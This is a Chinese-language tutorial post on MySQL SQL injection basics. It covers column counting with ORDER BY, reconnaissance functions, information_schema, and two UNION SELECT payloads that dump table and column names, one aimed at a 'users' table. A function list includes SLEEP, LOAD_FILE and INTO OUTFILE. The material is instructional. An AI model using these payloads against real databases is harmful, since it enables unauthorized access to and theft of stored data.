渗透之路基础 — SQL注入

------正文内容展示,开始汲取新知识啦------

图片[1]-渗透之路基础 — SQL注入-使者云

mysql注入

​ 获取字段数:order by x 去临界值
​ 获取数据库名:database()
​ 获取数据库版本:version()

​ information_schema : mysql5.0版本以上自带数据库,记录当前mysql下的所有数据库名,表名,列名。
​ information_schema.tables : 记录表名信息的表
​ information_schema.columns : 记录列名信息的表

​ table_name 表名
​ column_name 列名
​ schema_tables 数据库名

​ 数据库 “.” 代表下一级的意思

  • limit 有两个参数 limit 2,3 表示从2开始查3条
  • 通过MySql内置数据库获取表名
union select 1,group_concat(table_name),user(),4,5,6,7 from information_schema.tables where table_schema=database()
  • 通过MySql内置数据库获取表名对应的列名
union select 1,group_concat(column_name),user(),4,5,6,7 from information_schema.columns where table_name='users'
  • mysql注入(中)

​ 数据库用户 user()
​ 操作系统 @@version_compile_os

SQL常用函数

函数名称函数说明
MID(要截取的字符串,起始位置,结束位置)截取字符串
CHAR(ASCII)返回ASCII码对应的字符
ASCII(字符)返回字符对应的ASCII码
IF(逻辑表达式,返回值1,返回值2)用于判断
SUBSTR(要截取的字符串,起始位置,结束位置)截取字符串
LENGTH(字符串)返回字符串长度
COUNT(列名)返回当前列名下有效记录数
SLEEP(s)静止s秒,数字类型,可自定义
#、/**/、–注释符
CONCAT(字符串1,字符串2..)拼接字符串
LOAD_FILE(文件名称)加载文件
INTO OUTFILE ‘文件名称’输出

1 2 3 4 5 6 7 8 9

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞538赞赏 分享
抢沙发

请登录后发表评论

    暂无评论内容